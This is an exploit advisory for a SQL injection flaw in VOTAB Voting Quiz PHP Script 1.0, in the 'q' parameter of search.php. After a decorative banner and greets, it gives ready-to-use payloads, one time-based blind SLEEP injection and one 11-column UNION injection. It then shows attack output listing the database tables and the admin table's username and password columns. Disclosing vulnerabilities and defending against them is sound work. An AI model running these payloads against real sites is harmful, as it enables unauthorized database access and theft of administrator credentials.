Headline
VOTAB Voting Quiz PHP Script 1.0 SQL Injection
VOTAB Voting Quiz PHP Script version 1.0 suffers from a remote SQL injection vulnerability.
┌┌───────────────────────────────────────────────────────────────────────────────────────┐││ C r a C k E r ┌┘┌┘ T H E C R A C K O F E T E R N A L M I G H T ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ [ Vulnerability ] ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘: Author : CraCkEr :│ Website : codesler.com ││ Vendor : Codesler - Rohit Chouhan (codester.com) ││ Software : VOTAB - Voting Quiz PHP Script 1.0 ││ Vuln Type: SQL Injection ││ Impact : Database Access ││ ││────────────────────────────────────────────────────────────────────────────────────────││ ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘: :│ Release Notes: ││ ═════════════ ││ ││ SQL injection attacks can allow unauthorized access to sensitive data, modification of ││ data and crash the application or make it unavailable, leading to lost revenue and ││ damage to a company's reputation. ││ │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ © CraCkEr 2023 ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /search.phphttps://website/search.php?q=[SQLI]GET parameter 'q' is vulnerable to SQL Injection---Parameter: q (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: q=' AND (SELECT 5257 FROM (SELECT(SLEEP(5)))xauk) AND 'xYsK'='xYsK Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: q=' UNION ALL SELECT CONCAT(0x71707a7171,0x53474f4b726f5a754b696a76766959614569735371744d4d6d7a646a7069654b6666795967414a47,0x7176786b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ----[+] Starting the Attackfetching current databasecurrent database: '**401**_votab'fetching tables+---------------+| activity || admin || settings || smtp_settings || users || vote || votes |+---------------+fetching columns for table 'admin'[4 columns]+----------+-------------+| Column | Type |+----------+-------------+| id | int(11) || name | text || password | varchar(20) || username | varchar(20) |+----------+-------------+[-] Done